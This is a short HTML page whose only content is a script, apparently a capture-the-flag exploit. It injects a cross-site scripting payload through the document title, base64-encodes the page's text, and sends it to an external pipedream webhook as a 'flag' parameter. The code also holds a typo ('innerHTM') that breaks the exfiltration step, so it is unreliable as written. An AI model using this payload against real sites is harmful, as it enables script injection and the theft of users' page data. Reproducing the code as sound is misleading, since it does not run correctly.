<!DOCTYPE html>
<html>
<body>
    <script>
        const webhook = "https://eou0c9qohvcityk.m.pipedream.net";

        const payload = `</h1><img src="x" onerror="document.title = 'DATA:' + btoa(document.body.innerText)"><h1>`;

        setTimeout(() => {
            document.title = payload;
        }, 500);

        const catchInterval = setInterval(() => {
            if (document.body.innerHTML.includes("DATA:")) {
                const sec = document.body.innerHTM.split("DATA:")[1];
                (new Image()).src = webhook + "?flag=" + sec;
                clearInterval(catchInterval);
            }
        }, 500);
    </script>
</body>
</html>
